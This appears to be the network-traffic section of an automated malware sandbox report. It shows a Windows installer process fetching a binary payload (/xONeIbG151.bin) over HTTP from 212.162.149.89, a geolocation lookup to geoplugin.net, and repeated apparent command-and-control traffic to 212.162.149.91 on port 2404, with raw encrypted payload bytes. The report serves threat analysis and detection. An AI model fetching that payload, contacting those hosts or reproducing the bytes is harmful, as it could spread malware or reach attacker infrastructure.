                                                                          Dec 10, 2024 13:53:03.518719912 CET499392404192.168.2.5212.162.149.91
                                                                          Dec 10, 2024 13:53:03.518784046 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:03.519609928 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:03.519650936 CET499392404192.168.2.5212.162.149.91
                                                                          Dec 10, 2024 13:53:03.519699097 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:03.519752979 CET499392404192.168.2.5212.162.149.91
                                                                          Dec 10, 2024 13:53:03.520586014 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:03.520724058 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:03.521580935 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:03.521637917 CET499392404192.168.2.5212.162.149.91
                                                                          Dec 10, 2024 13:53:03.521688938 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:03.522622108 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:03.522670984 CET499392404192.168.2.5212.162.149.91
                                                                          Dec 10, 2024 13:53:03.522746086 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:03.523587942 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:03.523647070 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:03.523654938 CET499392404192.168.2.5212.162.149.91
                                                                          Dec 10, 2024 13:53:03.523685932 CET499392404192.168.2.5212.162.149.91
                                                                          Dec 10, 2024 13:53:03.524570942 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:03.524621964 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:03.524668932 CET499392404192.168.2.5212.162.149.91
                                                                          Dec 10, 2024 13:53:03.525541067 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:03.525598049 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:03.525660992 CET499392404192.168.2.5212.162.149.91
                                                                          Dec 10, 2024 13:53:03.526431084 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:03.526506901 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:03.527417898 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:03.527436018 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:03.527478933 CET499392404192.168.2.5212.162.149.91
                                                                          Dec 10, 2024 13:53:03.528434038 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:03.528547049 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:03.528593063 CET499392404192.168.2.5212.162.149.91
                                                                          Dec 10, 2024 13:53:03.543077946 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:03.543159008 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:03.543253899 CET499392404192.168.2.5212.162.149.91
                                                                          Dec 10, 2024 13:53:03.543484926 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:03.543612003 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:03.543859005 CET499392404192.168.2.5212.162.149.91
                                                                          Dec 10, 2024 13:53:03.544460058 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:03.544567108 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:03.544615984 CET499392404192.168.2.5212.162.149.91
                                                                          Dec 10, 2024 13:53:03.545443058 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:03.545557976 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:03.545605898 CET499392404192.168.2.5212.162.149.91
                                                                          Dec 10, 2024 13:53:03.546405077 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:03.546461105 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:03.546510935 CET499392404192.168.2.5212.162.149.91
                                                                          Dec 10, 2024 13:53:03.547348976 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:03.547456980 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:03.547719955 CET499392404192.168.2.5212.162.149.91
                                                                          Dec 10, 2024 13:53:03.548293114 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:03.548429966 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:03.548474073 CET499392404192.168.2.5212.162.149.91
                                                                          Dec 10, 2024 13:53:03.549246073 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:03.549375057 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:03.549428940 CET499392404192.168.2.5212.162.149.91
                                                                          Dec 10, 2024 13:53:03.550302029 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:03.550396919 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:03.550446033 CET499392404192.168.2.5212.162.149.91
                                                                          Dec 10, 2024 13:53:03.551183939 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:03.551290989 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:03.551342010 CET499392404192.168.2.5212.162.149.91
                                                                          Dec 10, 2024 13:53:03.552159071 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:03.552396059 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:03.553098917 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:03.553164005 CET499392404192.168.2.5212.162.149.91
                                                                          Dec 10, 2024 13:53:03.553198099 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:03.554090023 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:03.554133892 CET499392404192.168.2.5212.162.149.91
                                                                          Dec 10, 2024 13:53:03.554203987 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:03.554250002 CET499392404192.168.2.5212.162.149.91
                                                                          Dec 10, 2024 13:53:03.555030107 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:03.555126905 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:03.555476904 CET499392404192.168.2.5212.162.149.91
                                                                          Dec 10, 2024 13:53:03.555990934 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:03.556118011 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:03.556155920 CET499392404192.168.2.5212.162.149.91
                                                                          Dec 10, 2024 13:53:03.556947947 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:03.557060003 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:03.557092905 CET499392404192.168.2.5212.162.149.91
                                                                          Dec 10, 2024 13:53:03.557908058 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:03.558028936 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:03.558870077 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:03.558912992 CET499392404192.168.2.5212.162.149.91
                                                                          Dec 10, 2024 13:53:03.558974981 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:03.559832096 CET499392404192.168.2.5212.162.149.91
                                                                          Dec 10, 2024 13:53:03.559850931 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:03.559984922 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:03.560024977 CET499392404192.168.2.5212.162.149.91
                                                                          Dec 10, 2024 13:53:03.560775995 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:03.560895920 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:03.560928106 CET499392404192.168.2.5212.162.149.91
                                                                          Dec 10, 2024 13:53:03.561774015 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:03.561887980 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:03.562693119 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:03.562791109 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:03.563679934 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:03.563791990 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:03.564663887 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:03.564858913 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:03.565603018 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:03.565648079 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:03.565906048 CET499392404192.168.2.5212.162.149.91
                                                                          Dec 10, 2024 13:53:03.566523075 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:03.566694975 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:03.566736937 CET499392404192.168.2.5212.162.149.91
                                                                          Dec 10, 2024 13:53:03.567491055 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:03.567570925 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:03.567625999 CET499392404192.168.2.5212.162.149.91
                                                                          Dec 10, 2024 13:53:03.568474054 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:03.568569899 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:03.568618059 CET499392404192.168.2.5212.162.149.91
                                                                          Dec 10, 2024 13:53:03.569463968 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:03.569525957 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:03.569566011 CET499392404192.168.2.5212.162.149.91
                                                                          Dec 10, 2024 13:53:03.570386887 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:03.570497990 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:03.571358919 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:03.571402073 CET499392404192.168.2.5212.162.149.91
                                                                          Dec 10, 2024 13:53:03.571480989 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:03.571717024 CET499392404192.168.2.5212.162.149.91
                                                                          Dec 10, 2024 13:53:03.572313070 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:03.572405100 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:03.572568893 CET499392404192.168.2.5212.162.149.91
                                                                          Dec 10, 2024 13:53:03.573297024 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:03.573378086 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:03.573437929 CET499392404192.168.2.5212.162.149.91
                                                                          Dec 10, 2024 13:53:03.574268103 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:03.574352980 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:03.574630022 CET499392404192.168.2.5212.162.149.91
                                                                          Dec 10, 2024 13:53:03.575323105 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:03.575536966 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:03.575589895 CET499392404192.168.2.5212.162.149.91
                                                                          Dec 10, 2024 13:53:03.576145887 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:03.576189995 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:03.576247931 CET499392404192.168.2.5212.162.149.91
                                                                          Dec 10, 2024 13:53:03.577112913 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:03.630177975 CET499392404192.168.2.5212.162.149.91
                                                                          Dec 10, 2024 13:53:03.705369949 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:03.705393076 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:03.705461025 CET499392404192.168.2.5212.162.149.91
                                                                          Dec 10, 2024 13:53:03.705758095 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:03.705861092 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:03.705904007 CET499392404192.168.2.5212.162.149.91
                                                                          Dec 10, 2024 13:53:03.706716061 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:03.706856966 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:03.706898928 CET499392404192.168.2.5212.162.149.91
                                                                          Dec 10, 2024 13:53:03.707657099 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:03.707947016 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:03.707986116 CET499392404192.168.2.5212.162.149.91
                                                                          Dec 10, 2024 13:53:03.708059072 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:03.708923101 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:03.708964109 CET499392404192.168.2.5212.162.149.91
                                                                          Dec 10, 2024 13:53:03.709028006 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:03.710733891 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:03.710772991 CET499392404192.168.2.5212.162.149.91
                                                                          Dec 10, 2024 13:53:03.711244106 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:03.711256981 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:03.711268902 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:03.711317062 CET499392404192.168.2.5212.162.149.91
                                                                          Dec 10, 2024 13:53:03.711920023 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:03.711958885 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:03.711961031 CET499392404192.168.2.5212.162.149.91
                                                                          Dec 10, 2024 13:53:03.712843895 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:03.712882996 CET499392404192.168.2.5212.162.149.91
                                                                          Dec 10, 2024 13:53:03.712955952 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:03.713732004 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:03.713771105 CET499392404192.168.2.5212.162.149.91
                                                                          Dec 10, 2024 13:53:03.713773012 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:03.714699030 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:03.714740038 CET499392404192.168.2.5212.162.149.91
                                                                          Dec 10, 2024 13:53:03.714792013 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:03.715660095 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:03.715694904 CET499392404192.168.2.5212.162.149.91
                                                                          Dec 10, 2024 13:53:03.715719938 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:03.716618061 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:03.716665030 CET499392404192.168.2.5212.162.149.91
                                                                          Dec 10, 2024 13:53:03.716692924 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:03.717611074 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:03.717650890 CET499392404192.168.2.5212.162.149.91
                                                                          Dec 10, 2024 13:53:03.717710018 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:03.718544960 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:03.718588114 CET499392404192.168.2.5212.162.149.91
                                                                          Dec 10, 2024 13:53:03.718647957 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:03.719595909 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:03.719639063 CET499392404192.168.2.5212.162.149.91
                                                                          Dec 10, 2024 13:53:03.719759941 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:03.720443964 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:03.720482111 CET499392404192.168.2.5212.162.149.91
                                                                          Dec 10, 2024 13:53:03.735436916 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:03.735526085 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:03.735569954 CET499392404192.168.2.5212.162.149.91
                                                                          Dec 10, 2024 13:53:03.735902071 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:03.735919952 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:03.735959053 CET499392404192.168.2.5212.162.149.91
                                                                          Dec 10, 2024 13:53:03.736624956 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:03.736745119 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:03.736784935 CET499392404192.168.2.5212.162.149.91
                                                                          Dec 10, 2024 13:53:03.737631083 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:03.787682056 CET499392404192.168.2.5212.162.149.91
                                                                          Dec 10, 2024 13:53:05.877103090 CET499392404192.168.2.5212.162.149.91
                                                                          Dec 10, 2024 13:53:05.996629953 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:05.996649027 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:05.996782064 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:05.996798992 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:05.996813059 CET499392404192.168.2.5212.162.149.91
                                                                          Dec 10, 2024 13:53:05.996813059 CET499392404192.168.2.5212.162.149.91
                                                                          Dec 10, 2024 13:53:05.996836901 CET499392404192.168.2.5212.162.149.91
                                                                          Dec 10, 2024 13:53:05.996936083 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:05.996944904 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:05.997138977 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:05.997147083 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:05.997222900 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:05.997256041 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:06.116379023 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:06.116395950 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:06.116475105 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:06.116482973 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:06.116545916 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:06.116554976 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:06.116976023 CET240449939212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:06.117028952 CET499392404192.168.2.5212.162.149.91
                                                                          Dec 10, 2024 13:53:11.009152889 CET240449933212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:11.010538101 CET499332404192.168.2.5212.162.149.91
                                                                          Dec 10, 2024 13:53:11.130000114 CET240449933212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:41.035444021 CET240449933212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:53:41.037321091 CET499332404192.168.2.5212.162.149.91
                                                                          Dec 10, 2024 13:53:41.156707048 CET240449933212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:54:11.073110104 CET240449933212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:54:11.074604034 CET499332404192.168.2.5212.162.149.91
                                                                          Dec 10, 2024 13:54:11.193991899 CET240449933212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:54:41.109956026 CET240449933212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:54:41.121340036 CET499332404192.168.2.5212.162.149.91
                                                                          Dec 10, 2024 13:54:41.240809917 CET240449933212.162.149.91192.168.2.5
                                                                          Dec 10, 2024 13:54:45.005409956 CET4994080192.168.2.5178.237.33.50
                                                                          Dec 10, 2024 13:54:45.005502939 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:54:45.126367092 CET8049922212.162.149.89192.168.2.5
                                                                          Dec 10, 2024 13:54:45.126445055 CET4992280192.168.2.5212.162.149.89
                                                                          Dec 10, 2024 13:54:45.442737103 CET4994080192.168.2.5178.237.33.50
                                                                          Dec 10, 2024 13:54:46.130233049 CET4994080192.168.2.5178.237.33.50
                                                                          Dec 10, 2024 13:54:47.427112103 CET4994080192.168.2.5178.237.33.50
                                                                          Dec 10, 2024 13:54:49.895206928 CET4994080192.168.2.5178.237.33.50
                                                                          Dec 10, 2024 13:54:54.709548950 CET4994080192.168.2.5178.237.33.50
                                                                          Dec 10, 2024 13:55:04.333369017 CET4994080192.168.2.5178.237.33.50

                                                                          UDP Packets

                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                          Dec 10, 2024 13:53:00.565506935 CET5886553192.168.2.51.1.1.1
                                                                          Dec 10, 2024 13:53:00.800461054 CET53588651.1.1.1192.168.2.5

                                                                          DNS Queries

                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                          Dec 10, 2024 13:53:00.565506935 CET192.168.2.51.1.1.10x418bStandard query (0)geoplugin.netA (IP address)IN (0x0001)false

                                                                          DNS Answers

                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                          Dec 10, 2024 13:53:00.800461054 CET1.1.1.1192.168.2.50x418bNo error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false

                                                                          HTTP Request Dependency Graph

                                                                          • 212.162.149.89
                                                                          • geoplugin.net

                                                                          HTTP Packets

                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          0192.168.2.549922212.162.149.89805752C:\Windows\SysWOW64\msiexec.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Dec 10, 2024 13:52:55.150271893 CET173OUTGET /xONeIbG151.bin HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                          Host: 212.162.149.89
                                                                          Cache-Control: no-cache
                                                                          Dec 10, 2024 13:52:56.311058044 CET1236INHTTP/1.1 200 OK
                                                                          Content-Type: application/octet-stream
                                                                          Last-Modified: Tue, 10 Dec 2024 08:06:12 GMT
                                                                          Accept-Ranges: bytes
                                                                          ETag: "6298261da4adb1:0"
                                                                          Server: Microsoft-IIS/8.5
                                                                          Date: Tue, 10 Dec 2024 12:52:56 GMT
                                                                          Content-Length: 493120
                                                                          Data Raw: c6 0c d1 25 99 e7 06 7e 86 e1 ad f4 fa f0 fb de df 0c 5b 6f 49 43 6c a6 ca b9 12 ff 5f 36 34 c9 eb 51 b6 4a 6d 93 8f af 54 49 6e b5 29 3a 12 1e 6a a2 f1 44 0f 9c 6a b7 25 50 f0 bb 02 16 7c fc 2b 41 cc c2 b6 79 48 2a 58 5d 51 60 6e 1e 8f e3 35 d6 61 93 12 78 56 22 bc 7f 17 b8 00 4a 65 e9 a3 4f 7a 9f a5 fd cb 3b 1d 07 0a 7d 2b 5f 1d 8e 59 49 23 73 96 eb 66 ec fa a9 8d 0b 1d 34 c3 06 d4 e8 2a 8d 46 af 9a ce 42 eb 25 af b9 76 6a 7f cb 9f b5 88 32 c9 49 c5 72 62 f0 e6 c9 b1 c4 76 ae a6 1c a8 e6 eb f1 d6 89 85 3f 40 30 1c 0a a1 e9 b2 48 3c be c0 75 9c 89 0f 1f ce 46 6c 1f 8e 12 ff 5e 97 1a 9a 17 89 f7 13 75 69 21 ba f8 1e 92 8d 84 ce 81 16 a6 c3 78 e0 49 a2 d3 00 95 18 c9 34 26 2e b5 bb f2 63 a1 a7 84 5e 3e b5 de 18 b9 a0 8b 6a dc d3 c2 ab 97 c2 54 09 ee dd a1 79 40 d1 96 d8 17 5c 23 8d 57 d4 04 70 b1 94 f4 73 22 89 d0 50 d7 11 cc 76 5f 89 3a ec bc b8 29 dc 79 5a fc e0 5c ac 9a 7a 65 ac 02 73 cf c7 60 cd a1 f7 10 45 1d 00 0e 18 c1 2c de c5 14 9c 49 4e cc 14 5a f1 e9 0d 70 71 10 22 0b c5 cd b6 05 c4 99 65 [TRUNCATED]
                                                                          Data Ascii: %~[oICl_64QJmTIn):jDj%P|+AyH*X]Q`n5axV"JeOz;}+_YI#sf4*FB%vj2Irbv?@0H<uFl^ui!xI4&.c^>jTy@\#Wps"Pv_:)yZ\zes`E,INZpq"eZvj4ypRW:v3Cw<"<%Z)-'FV/(s}gM+Ul,H|L~\p`|#,RyK{&Bmh'AEp*Y-Kx(}G9X]8bG3MY*ND<G:),E5]L5}"Px4SK[azIlwO(s#uKaEl3On5T)+(^c|yeB@:#tE(z94mQA d4O=#Wa[yz3q0*7x:H%Y[Zxw,K(3ec;/+Yrfr#!V;mR~mTI^;=\o4yr4*vMxg!}JQzw/bDV#QB*F\z'*%A3$><x#a7IQz6>"%5P{S}KK_i|,=+,!Fj
                                                                          Dec 10, 2024 13:52:56.311099052 CET1236INData Raw: 9d a6 d4 cb 27 06 6a 9a 55 9e 05 f0 21 11 1d bc e1 0c 16 f1 d1 59 b6 04 7b 46 b8 b0 b3 96 e0 eb d4 33 fa b3 7a 8a ac fd 84 85 c4 49 27 23 c6 b7 8e f9 6a bf 8e bc 0d 93 93 94 f1 07 97 4b 3d a2 b5 d4 f6 3e dd 11 54 bd d1 3a 37 0b ca d3 d9 45 9c f0
                                                                          Data Ascii: 'jU!Y{F3zI'#jK=>T:7Ef_a0y Ug*NzB`r,k>w=JGap_lG&=;}=a!uVl^Ae%-WN\\$o\H +/?VOhV?4:+8YIKfLzV
                                                                          Dec 10, 2024 13:52:56.311110973 CET1236INData Raw: 91 fa 4e 44 55 bf 00 a2 1a 64 bf 56 c9 66 27 cb 53 86 e2 41 1b 40 76 be c2 87 03 be db c5 b4 cd c2 60 eb a4 45 62 9a 56 fe 14 c9 7e d0 f0 ff a5 a2 24 8b f2 79 a0 d3 56 5d 51 08 5c 8f ca e3 65 3c 42 90 12 21 95 48 fc c6 87 f1 47 4a 8d 1b 88 4f 7a
                                                                          Data Ascii: NDUdVf'SA@v`EbV~$yV]Q\e<B!HGJOzr;)~+qes{VepV% 0_+$ GtP;@FV}Jm7EmPR`75z!UqFb-;Ox*P|*w4:y^CAYQW.LG-
                                                                          Dec 10, 2024 13:52:56.311240911 CET1236INData Raw: ce bf 40 25 d6 b5 61 09 59 98 5c 84 ed 19 57 ca 5a dd 2e 11 81 b8 a9 b3 0f 3b ff b6 04 43 90 dd 7a 0e a3 32 c1 f6 90 48 1f 99 ae e1 1b 8e ee 86 16 26 d6 a0 8b 7e 25 53 f4 27 d9 ed 21 e9 f8 fa a2 22 6d 5e 4c e6 fd 39 67 4e 87 48 0e 66 c8 e8 16 9e
                                                                          Data Ascii: @%aY\WZ.;Cz2H&~%S'!"m^L9gNHfm&fImKH-=CL{xvkHlj*@gv$zH@[JYekgj@>$l-4QW:}TZxM"J6<u%'
                                                                          Dec 10, 2024 13:52:56.311253071 CET896INData Raw: af fd a8 fd 26 10 3e 1d 42 7e 01 84 34 e1 b5 c4 f8 85 e4 43 4b 33 71 24 7b 03 73 46 4f ba 3e 47 44 5b b7 8e bf 18 8b 55 e7 af d4 90 32 0a 4a 93 33 ed 0d 26 fa b1 8f 99 c7 81 b7 8b 0a 1a fa b9 71 5a fd ac 6a ba 42 20 15 78 84 8e 80 f4 d8 5d 32 5f
                                                                          Data Ascii: &>B~4CK3q${sFO>GD[U2J3&qZjB x]2_l<#aZMBws'GC(?YU,!myEAPss,LP3Y3G9e3{v4S:ues}KB}{(4'b"K*^FvWYZFF
                                                                          Dec 10, 2024 13:52:56.350718021 CET1236INData Raw: 97 e4 29 3e 4a 0c 40 c2 7f a9 ae 9f c8 b1 04 2d 65 fc 64 93 12 26 9f e0 f4 7f 42 33 ec 1b 33 be 28 b6 92 be 5a 02 34 b0 ed 8c c4 95 04 a0 e2 71 dd 89 57 66 1d a5 72 ad ab 56 bb 80 da dd c5 f9 25 08 1b 4b ae 5d 97 03 63 d0 42 f3 74 da 7b e8 f2 ba
                                                                          Data Ascii: )>J@-ed&B33(Z4qWfrV%K]cBt{RT.z7j%y'M{g1~{PaV_Vl3:VP1tbrAkd&H&z[,'Vxw%fbB ;/Sqq6 {iXEz? V+{q)
